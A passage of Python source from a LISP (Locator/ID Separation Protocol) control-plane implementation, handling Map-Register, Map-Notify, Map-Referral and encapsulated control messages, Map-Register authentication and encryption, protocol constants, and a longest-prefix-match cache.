        changed_rloc_set = \
            (site_eid.do_rloc_sets_match(previous_rlocs) == False)

        #
        # Do not replace RLOCs if the Map-Register is a refresh and the
        # locator-set is different.
        #
        if (map_register.map_register_refresh and changed_rloc_set and
            site_eid.registered):
            lprint(" Reject registration, refreshes cannot change RLOC-set")
            site_eid.registered_rlocs = previous_rlocs
            continue
        #endif

        #
        # Copy fields from packet into internal data structure. First set
        # site EID specific state.
        #
        if (site_eid.registered == False):
            site_eid.first_registered = lisp_get_timestamp()
            lisp_registered_count += 1
        #endif
        site_eid.last_registered = lisp_get_timestamp()
        site_eid.registered = (eid_record.record_ttl != 0)
        site_eid.last_registerer = source

        #
        # Now set site specific state.
        #
        site_eid.auth_sha1_or_sha2 = sha1_or_sha2
        site_eid.proxy_reply_requested = map_register.proxy_reply_requested
        site_eid.lisp_sec_present = map_register.lisp_sec_present
        site_eid.map_notify_requested = map_register.map_notify_requested
        site_eid.mobile_node_requested = map_register.mobile_node
        site_eid.merge_register_requested = \
            map_register.merge_register_requested
        site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
        if (site_eid.use_register_ttl_requested):
            site_eid.register_ttl = eid_record.store_ttl()
        else:
            site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
        #endif
        site_eid.xtr_id_present = map_register.xtr_id_present
        if (site_eid.xtr_id_present):
            site_eid.xtr_id = map_register.xtr_id
            site_eid.site_id = map_register.site_id
        #endif

        #
        # If merge requested, do it now for this EID-prefix.
        #
        if (map_register.merge_register_requested):
            if (parent.merge_in_site_eid(site_eid)):
                rle_list.append([eid_record.eid, eid_record.group])
            #endif
            if (map_register.map_notify_requested):
                lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
                    eid_record)
            #endif
        #endif

        if (changed_rloc_set == False): continue
        if (len(rle_list) != 0): continue

        eid_list.append(site_eid.print_eid_tuple())

        #
        # Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
        # to the previously registered RLOCs only if they requested it. Do
        # not consider RLOC-sets with RLEs in them because at the end of
        # the EID-record loop, we'll send a multicast Map-Notify.
        #
        eid_record = eid_record.encode()
        eid_record += start_rloc_records
        el = [site_eid.print_eid_tuple()]
        lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")

        for rloc in previous_rlocs:
            if (rloc.map_notify_requested == False): continue
            if (rloc.rloc.is_exact_match(source)): continue
            lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
                LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
                map_register.alg_id, map_register.auth_len, site, False)
        #endfor

        #
        # Check subscribers.
        #
        lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
    #endfor

    #
    # Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
    #
    if (len(rle_list) != 0):
        lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
    #endif

    #
    # The merged Map-Notify will serve as a Map-Register ack. So don't need
    # to send another one below.
    #
    if (map_register.merge_register_requested): return

    #
    # Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
    # by the registerer.
    #
    if (map_register.map_notify_requested and site != None):
        lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
            map_register.record_count, source, sport, map_register.nonce,
            map_register.key_id, map_register.alg_id, map_register.auth_len,
            site, True)
    #endif
    return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
    """Have the ITR process receive a multicast Map-Notify message.

    Updates the map-cache with a new RLE for each (S,G) EID-record. No
    authentication or Map-Notify-Ack is done here — the lisp-etr process
    has already done both. 'source' is either an address or the string
    "lisp-etr" when the message came over IPC.
    """
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return
    #endif

    map_notify.print_notify()
    if (map_notify.record_count == 0): return

    eid_records = map_notify.eid_records
    for i in range(map_notify.record_count):
        eid_record = lisp_eid_record()
        eid_records = eid_record.decode(eid_records)

        #
        # Bug fix: test the value just decoded. The old code tested
        # 'packet', which is always non-None at this point, so a truncated
        # EID-record went undetected and decode(None) crashed on the next
        # iteration.
        #
        if (eid_records == None): return
        eid_record.print_record(" ", False)

        #
        # Get or create map-cache entry for (S,G).
        #
        mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
        if (mc == None):
            allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
                None)
            if (allow == False): continue

            mc = lisp_mapping(eid_record.eid, eid_record.group, [])
            mc.add_cache()
        #endif

        #
        # Gleaned map-cache entries always override what is registered in
        # the mapping system. Since the mapping system RLE entries are RTRs
        # and RTRs store gleaned mappings for group members.
        #
        if (mc.gleaned):
            lprint("Ignore Map-Notify for gleaned {}".format( \
                green(mc.print_eid_tuple(), False)))
            continue
        #endif

        mc.mapping_source = None if source == "lisp-etr" else source
        mc.map_cache_ttl = eid_record.store_ttl()

        #
        # If no RLOCs in the Map-Notify and we had RLOCs in the existing
        # map-cache entry, remove them.
        #
        if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
            mc.rloc_set = []
            mc.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, mc)
            lprint("Update {} map-cache entry with no RLOC-set".format( \
                green(mc.print_eid_tuple(), False)))
            continue
        #endif

        rtr_mc = mc.rtrs_in_rloc_set()

        #
        # If there are RTRs in the RLOC set for an existing map-cache entry,
        # only put RTR RLOCs from the Map-Notify in the map-cache.
        #
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            eid_records = rloc_record.decode(eid_records, None)
            rloc_record.print_record(" ")
            if (eid_record.group.is_null()): continue
            if (rloc_record.rle == None): continue

            #
            # Get copy of stats from old stored record so the display can
            # look continuous even though the physical pointer is changing.
            #
            stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None

            #
            # Store in map-cache.
            #
            rloc = lisp_rloc()
            rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
            if (stats != None): rloc.stats = copy.deepcopy(stats)
            if (rtr_mc and rloc.is_rtr() == False): continue

            mc.rloc_set = [rloc]
            mc.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, mc)

            lprint("Update {} map-cache entry with RLE {}".format( \
                green(mc.print_eid_tuple(), False),
                rloc.rle.print_rle(False, True)))
        #endfor
    #endfor
    return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
    """Process a Map-Notify message: authenticate against the sending
    Map-Server (when auth data is present), forward multicast (S,G)
    records to the lisp-itr process via IPC, and reply with a
    Map-Notify-Ack.
    """
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(orig_packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return
    #endif

    map_notify.print_notify()

    #
    # Get map-server so we can do statistics and find auth-key, if a auth-key
    # was provided in a Map-Notify message.
    #
    s = source.print_address()
    if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
        # Note: no break on match, so the last matching entry wins.
        ms = None
        for key in lisp_map_servers_list:
            if (key.find(s) == -1): continue
            ms = lisp_map_servers_list[key]
        #endfor
        if (ms == None):
            lprint((" Could not find Map-Server {} to authenticate " + \
                "Map-Notify").format(s))
            return
        #endif

        ms.map_notifies_received += 1

        auth_good = lisp_verify_auth(packet, map_notify.alg_id,
            map_notify.auth_data, ms.password)
        lprint(" Authentication {} for Map-Notify".format("succeeded" if \
            auth_good else "failed"))
        if (auth_good == False): return
    else:
        # Unauthenticated Map-Notify: build a placeholder map-server so the
        # ack path below has an 'ms' to work with.
        ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
            None)
    #endif

    #
    # Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
    # starts the packet with EID-records.
    #
    eid_records = map_notify.eid_records
    if (map_notify.record_count == 0):
        lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
        return
    #endif

    #
    # If this is a Map-Notify for an (S,G) entry, send the message to the
    # lisp-itr process so it can update its map-cache for an active source
    # in this site. There is probably a RLE change that the ITR needs to know
    # about.
    #
    eid_record = lisp_eid_record()
    packet = eid_record.decode(eid_records)
    if (packet == None): return
    eid_record.print_record(" ", False)

    for j in range(eid_record.rloc_count):
        rloc_record = lisp_rloc_record()
        packet = rloc_record.decode(packet, None)
        if (packet == None):
            lprint(" Could not decode RLOC-record in Map-Notify packet")
            return
        #endif
        rloc_record.print_record(" ")
    #endfor

    #
    # Right now, don't do anything with non-multicast EID records.
    #
    if (eid_record.group.is_null() == False):
        #
        # Forward to lisp-itr process via the lisp-core process so multicast
        # Map-Notify messages are processed by the ITR process.
        #
        lprint("Send {} Map-Notify IPC message to ITR process".format( \
            green(eid_record.print_eid_tuple(), False)))

        ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
        lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
    #endif

    #
    # Send Map-Notify-Ack after processing contents of Map-Notify.
    #
    lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
    return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
    """Process a received Map-Notify-Ack: authenticate it via the site of
    the first EID-record, then remove the corresponding Map-Notify from
    lisp_map_notify_queue so it is no longer retransmitted.
    """
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify-Ack packet")
        return
    #endif

    map_notify.print_notify()

    #
    # Get an EID-prefix out of the Map-Notify-Ack so we can find the site
    # associated with it.
    #
    if (map_notify.record_count < 1):
        lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
        return
    #endif

    eid_record = lisp_eid_record()

    if (eid_record.decode(map_notify.eid_records) == None):
        lprint("Could not decode EID-record, cannot authenticate " +
            "Map-Notify-Ack")
        return
    #endif
    eid_record.print_record(" ", False)

    eid_str = eid_record.print_eid_tuple()

    #
    # Find site associated with EID-prefix from first record.
    #
    if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
        site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
        if (site_eid == None):
            notfound = bold("Site not found", False)
            lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
                format(notfound, green(eid_str, False)))
            return
        #endif
        site = site_eid.site

        #
        # Count it.
        #
        site.map_notify_acks_received += 1

        key_id = map_notify.key_id
        if (site.auth_key.has_key(key_id)):
            password = site.auth_key[key_id]
        else:
            password = ""
        #endif

        auth_good = lisp_verify_auth(packet, map_notify.alg_id,
            map_notify.auth_data, password)

        key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
            else "bad key-id {}".format(map_notify.key_id)

        lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
            "succeeded" if auth_good else "failed", key_id))
        if (auth_good == False): return
    #endif

    #
    # Remove Map-Notify from retransmission queue.
    #
    if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()

    etr = source.print_address()
    key = map_notify.nonce_key

    if (lisp_map_notify_queue.has_key(key)):
        map_notify = lisp_map_notify_queue.pop(key)
        if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
        lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
            format(key))
    else:
        lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
            format(map_notify.nonce_key, red(etr, False)))
    #endif
    return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
    """Return True when the Map-Referral EID-prefix from 's' is NOT
    more-specific than the prefix cached on Map-Request queue entry 'mr' —
    i.e. the referral chain is looping rather than narrowing.
    Only node/MS referral actions are subject to this check.
    """
    referral_actions = (LISP_DDT_ACTION_NODE_REFERRAL,
        LISP_DDT_ACTION_MS_REFERRAL)
    if (action not in referral_actions): return(False)

    cached_eid = mr.last_cached_prefix[0]
    cached_group = mr.last_cached_prefix[1]
    if (cached_eid == None): return(False)

    #
    # Check group first, if any. Then EID-prefix as source if (S,G).
    #
    looping = False
    if (group.is_null() == False):
        looping = cached_group.is_more_specific(group)
    #endif
    if (looping == False): looping = cached_eid.is_more_specific(eid)

    if (looping):
        prefix_str = lisp_print_eid_tuple(eid, group)
        cached_str = lisp_print_eid_tuple(cached_eid, cached_group)
        lprint(("Map-Referral prefix {} from {} is not more-specific " + \
            "than cached prefix {}").format(green(prefix_str, False), s,
            cached_str))
    #endif
    return(looping)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
    """Process a Map-Referral message received by a Map-Resolver.

    For each EID-record: match it to a queued DDT Map-Request by nonce,
    check for referral loops, add/refresh the referral-cache entry and its
    referral-node set, then act on the referral action code (negative
    reply, retry at root, follow the referral, or ack).
    """
    map_referral = lisp_map_referral()
    packet = map_referral.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Referral packet")
        return
    #endif
    map_referral.print_map_referral()

    s = source.print_address()
    nonce = map_referral.nonce

    #
    # Process each EID record in Map-Reply message.
    #
    for i in range(map_referral.record_count):
        eid_record = lisp_eid_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Referral packet")
            return
        #endif
        eid_record.print_record(" ", True)

        #
        # Check if we have an outstanding request for this Map-Referral reply.
        #
        key = str(nonce)
        if (key not in lisp_ddt_map_requestQ):
            lprint(("Map-Referral nonce 0x{} from {} not found in " + \
                "Map-Request queue, EID-record ignored").format( \
                lisp_hex_string(nonce), s))
            continue
        #endif
        mr = lisp_ddt_map_requestQ[key]
        if (mr == None):
            lprint(("No Map-Request queue entry found for Map-Referral " +
                "nonce 0x{} from {}, EID-record ignored").format( \
                lisp_hex_string(nonce), s))
            continue
        #endif

        #
        # Check for Map-Referral looping. If there is no loop cache the EID
        # returned from the Map-Referral in the Map-Request queue entry.
        #
        if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
            eid_record.action, s)):
            mr.dequeue_map_request()
            continue
        #endif

        mr.last_cached_prefix[0] = eid_record.eid
        mr.last_cached_prefix[1] = eid_record.group

        #
        # Lookup referral in referral-cache.
        #
        add_or_replace = False
        referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
            True)
        if (referral == None):
            add_or_replace = True
            referral = lisp_referral()
            referral.eid = eid_record.eid
            referral.group = eid_record.group
            if (eid_record.ddt_incomplete == False): referral.add_cache()
        elif (referral.referral_source.not_set()):
            lprint("Do not replace static referral entry {}".format( \
                green(referral.print_eid_tuple(), False)))
            mr.dequeue_map_request()
            continue
        #endif

        action = eid_record.action
        referral.referral_source = source
        referral.referral_type = action
        ttl = eid_record.store_ttl()
        referral.referral_ttl = ttl
        referral.expires = lisp_set_timestamp(ttl)

        #
        # Mark locator up if the Map-Referral source is in the referral-set.
        #
        negative = referral.is_referral_negative()
        if (referral.referral_set.has_key(s)):
            ref_node = referral.referral_set[s]

            if (ref_node.updown == False and negative == False):
                ref_node.updown = True
                lprint("Change up/down status for referral-node {} to up". \
                    format(s))
            elif (ref_node.updown == True and negative == True):
                ref_node.updown = False
                lprint(("Change up/down status for referral-node {} " + \
                    "to down, received negative referral").format(s))
            #endif
        #endif

        #
        # Set dirty-bit so we can remove referral-nodes from cached entry
        # that wasn't in packet.
        #
        dirty_set = {}
        for key in referral.referral_set: dirty_set[key] = None

        #
        # Process each referral RLOC-record in EID record.
        #
        for i in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            packet = rloc_record.decode(packet, None)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Referral packet")
                return
            #endif
            rloc_record.print_record(" ")

            #
            # Copy over existing referral-node
            #
            addr_str = rloc_record.rloc.print_address()
            if (referral.referral_set.has_key(addr_str) == False):
                ref_node = lisp_referral_node()
                ref_node.referral_address.copy_address(rloc_record.rloc)
                referral.referral_set[addr_str] = ref_node
                if (s == addr_str and negative): ref_node.updown = False
            else:
                ref_node = referral.referral_set[addr_str]
                if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
            #endif
            ref_node.priority = rloc_record.priority
            ref_node.weight = rloc_record.weight
        #endfor

        #
        # Now remove dirty referral-node entries.
        #
        for key in dirty_set: referral.referral_set.pop(key)

        eid_str = referral.print_eid_tuple()
        if (add_or_replace):
            if (eid_record.ddt_incomplete):
                lprint("Suppress add {} to referral-cache".format( \
                    green(eid_str, False)))
            else:
                lprint("Add {}, referral-count {} to referral-cache".format( \
                    green(eid_str, False), eid_record.rloc_count))
            #endif
        else:
            lprint("Replace {}, referral-count: {} in referral-cache".format( \
                green(eid_str, False), eid_record.rloc_count))
        #endif

        #
        # Process actions.
        #
        if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
            lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
                referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
            mr.dequeue_map_request()
        #endif

        if (action == LISP_DDT_ACTION_NOT_AUTH):
            if (mr.tried_root):
                lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
                    referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
                mr.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(mr, True)
            #endif
        #endif

        if (action == LISP_DDT_ACTION_MS_NOT_REG):
            if (referral.referral_set.has_key(s)):
                ref_node = referral.referral_set[s]
                ref_node.updown = False
            #endif
            if (len(referral.referral_set) == 0):
                mr.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(mr, False)
            #endif
        #endif

        if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
            LISP_DDT_ACTION_MS_REFERRAL)):
            if (mr.eid.is_exact_match(eid_record.eid)):
                if (not mr.tried_root):
                    lisp_send_ddt_map_request(mr, True)
                else:
                    lisp_send_negative_map_reply(mr.lisp_sockets,
                        referral.eid, referral.group, mr.nonce, mr.itr,
                        mr.sport, 15, None, False)
                    mr.dequeue_map_request()
                #endif
            else:
                lisp_send_ddt_map_request(mr, False)
            #endif
        #endif

        if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
    #endfor
    return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
    """Decapsulate an Encapsulated-Control-Message and dispatch the inner
    message, which is assumed (and checked) to be a Map-Request.
    """
    ecm = lisp_ecm(0)
    packet = ecm.decode(packet)
    if (packet == None):
        lprint("Could not decode ECM packet")
        return
    #endif

    ecm.print_ecm()

    #
    # Peek at the inner control header to confirm a Map-Request is inside.
    #
    inner_header = lisp_control_header()
    if (inner_header.decode(packet) == None):
        lprint("Could not decode control header")
        return
    #endif
    inner_type = inner_header.type
    del(inner_header)

    if (inner_type != LISP_MAP_REQUEST):
        lprint("Received ECM without Map-Request inside")
        return
    #endif

    #
    # Hand off the inner Map-Request with the inner UDP source port.
    #
    lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
        ecm.source, ecm.udp_sport, ecm.ddt, -1)
    return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
    """
    Finalize a prebuilt Map-Register 'packet' for map-server 'ms'
    (recompute the authentication hash, optionally encrypt the body) and
    transmit it on the LISP control port.
    """
    #
    # If we are doing LISP-Decent and have a multicast group configured as
    # a Map-Server, we can't join the group by using the group so we have to
    # send to the loopback address to bootstrap our membership. We join to
    # one other member of the peer-group so we can get the group membership.
    #
    dest = ms.map_server
    if (lisp_decent_push_configured and dest.is_multicast_address() and
        (ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
        dest = copy.deepcopy(dest)
        dest.address = 0x7f000001   # 127.0.0.1
        b = bold("Bootstrap", False)
        g = ms.map_server.print_address_no_iid()
        lprint("{} mapping system for peer-group {}".format(b, g))
    #endif
    #
    # Modify authentication hash in Map-Register message if supplied when
    # lisp_map_register() was called.
    #
    packet = lisp_compute_auth(packet, map_register, ms.password)
    #
    # Should we encrypt the Map-Register? Use 16-byte key which is
    # 32 string characters.
    #
    if (ms.ekey != None):
        ekey = ms.ekey.zfill(32)
        iv = "0" * 8
        # Encrypt everything after the 4-byte message header.
        ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
        packet = packet[0:4] + ciphertext
        e = bold("Encrypt", False)
        lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
    #endif
    decent = ""
    if (lisp_decent_pull_xtr_configured()):
        decent = ", decent-index {}".format(bold(ms.dns_name, False))
    #endif
    lprint("Send Map-Register to map-server {}{}{}".format( \
        dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
    """
    Hand a LISP control packet to the lisp-core process over IPC so it can
    be sourced from the well-known UDP control port.
    """
    addr_str = dest.print_address_no_iid()
    lprint("Send IPC {} bytes to {} {}, control-packet: {}".format(
        len(packet), addr_str, port, lisp_format_packet(packet)))

    ipc_packet = lisp_control_packet_ipc(packet, lisp_socket.getsockname(),
        addr_str, port)
    lisp_ipc(ipc_packet, lisp_socket, "lisp-core-pkt")
    return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
    """Send a Map-Reply to 'dest' (must be RLOC-routable) via lisp-core."""
    lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
    """Send a Map-Referral to 'dest' (must be RLOC-routable) via lisp-core."""
    lprint("Send Map-Referral to {}".format(dest.print_address()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
    """Send a Map-Notify to an xTR (must be RLOC-routable) via lisp-core."""
    lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
    outer_dest, to_etr=False, to_ms=False, ddt=False):
    """
    Prepend an Encapsulated-Control-Message header to 'packet' and send it
    to 'outer_dest' on the LISP control port.
    """
    if (inner_source == None or inner_source.is_null()):
        inner_source = inner_dest
    #endif
    #
    # For sending Map-Requests, if the NAT-traversal configured, use same
    # socket used to send the Info-Request.
    #
    if (lisp_nat_traversal):
        sport = lisp_get_any_translated_port()
        if (sport != None): inner_sport = sport
    #endif
    ecm = lisp_ecm(inner_sport)
    # Only set the to-ETR/to-MS bits when the respective process runs here.
    ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
    ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
    ecm.ddt = ddt
    ecm_packet = ecm.encode(packet, inner_source, inner_dest)
    if (ecm_packet == None):
        lprint("Could not encode ECM message")
        return
    #endif
    ecm.print_ecm()
    packet = ecm_packet + packet
    addr_str = outer_dest.print_address_no_iid()
    lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3       # internal sentinel; wire-encoded as an LCAF
LISP_AFI_IID_RANGE = -2       # internal sentinel for instance-id ranges
LISP_AFI_ULTIMATE_ROOT = -1   # internal sentinel for the root of EID space
LISP_AFI_NONE = 0             # no address encoded
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17            # distinguished-name
LISP_AFI_LCAF = 16387         # LISP Canonical Address Format
#
# Per-RLOC state values (LISP_RLOC_*_STATE).
#
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
#
# Authentication hash types (LISP_AUTH_*).
#
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32    # bits in a host IPv4 address
LISP_IPV6_HOST_MASK_LEN = 128   # bits in a host IPv6 address
LISP_MAC_HOST_MASK_LEN = 48     # bits in a MAC address
LISP_E164_HOST_MASK_LEN = 60    # bits in an E.164 number (15 BCD digits)
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
    """
    Return the 64-bit value 'address' with its 8 bytes in reverse order.
    """
    swapped = 0
    for i in range(8):
        swapped = (swapped << 8) | ((address >> (i * 8)) & 0xff)
    #endfor
    return(swapped)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
    def __init__(self):
        # One mask-length bucket of a lisp_cache: entries keyed by the
        # "<iid><afi><address>" string built by lisp_cache.build_key(),
        # plus a sorted copy of the keys for deterministic iteration.
        self.entries = {}
        self.entries_sorted = []
    #enddef
#endclass
class lisp_cache():
    """
    Longest-prefix-match cache. The first level is an associative array
    keyed by mask-length (walked in sorted order, least specific first);
    each mask-length bucket is a lisp_cache_entries keyed by the string
    "<32-bit-instance-id><16-bit-afi><eid-prefix>".
    """
    def __init__(self):
        self.cache = {}
        self.cache_sorted = []
        self.cache_count = 0
    #enddef
    def cache_size(self):
        """Return the total number of entries across all mask-lengths."""
        return(self.cache_count)
    #enddef
    def build_key(self, prefix):
        """
        Return [mask-length, key-string] for 'prefix'. AFI-based prefixes
        bias the mask-length by 48 so instance-id ranges (unbiased) always
        sort ahead of them.
        """
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
            ml = 0
        elif (prefix.afi == LISP_AFI_IID_RANGE):
            ml = prefix.mask_len
        else:
            ml = prefix.mask_len + 48
        #endif
        iid = lisp_hex_string(prefix.instance_id).zfill(8)
        afi = lisp_hex_string(prefix.afi).zfill(4)
        if (prefix.afi > 0):
            if (prefix.is_binary()):
                length = prefix.addr_length() * 2
                addr = lisp_hex_string(prefix.address).zfill(length)
            else:
                addr = prefix.address
            #endif
        elif (prefix.afi == LISP_AFI_GEO_COORD):
            afi = "8003"
            addr = prefix.address.print_geo()
        else:
            afi = ""
            addr = ""
        #endif
        key = iid + afi + addr
        return([ml, key])
    #enddef
    def add_cache(self, prefix, entry):
        """Insert or overwrite 'entry' stored under 'prefix'."""
        if (prefix.is_binary()): prefix.zero_host_bits()
        ml, key = self.build_key(prefix)
        #
        # Use "in" rather than dict.has_key(), which was removed in Py3.
        #
        if (ml not in self.cache):
            self.cache[ml] = lisp_cache_entries()
            self.cache[ml].entries = {}
            self.cache[ml].entries_sorted = []
            self.cache_sorted = sorted(self.cache)
        #endif
        if (key not in self.cache[ml].entries):
            self.cache_count += 1
        #endif
        self.cache[ml].entries[key] = entry
        self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
    #enddef
    def lookup_cache(self, prefix, exact):
        """
        Exact lookup returns the entry stored under 'prefix' or None.
        Longest-match walks mask-lengths in increasing order and returns
        the most specific entry that covers 'prefix', or None.
        """
        ml_key, key = self.build_key(prefix)
        if (exact):
            if (ml_key not in self.cache): return(None)
            if (key not in self.cache[ml_key].entries): return(None)
            return(self.cache[ml_key].entries[key])
        #endif
        found = None
        for ml in self.cache_sorted:
            # Buckets are sorted; nothing longer than ml_key can cover us.
            if (ml_key < ml): return(found)
            for entry_key in self.cache[ml].entries_sorted:
                entries = self.cache[ml].entries
                if (entry_key in entries):
                    entry = entries[entry_key]
                    if (entry == None): continue
                    if (prefix.is_more_specific(entry.eid)): found = entry
                #endif
            #endfor
        #endfor
        return(found)
    #enddef
    def delete_cache(self, prefix):
        """Remove the entry stored under 'prefix', if present."""
        ml, key = self.build_key(prefix)
        if (ml not in self.cache): return
        if (key not in self.cache[ml].entries): return
        self.cache[ml].entries.pop(key)
        self.cache[ml].entries_sorted.remove(key)
        self.cache_count -= 1
        #
        # Drop an emptied mask-length bucket so longest-match walks do not
        # keep iterating over it.
        #
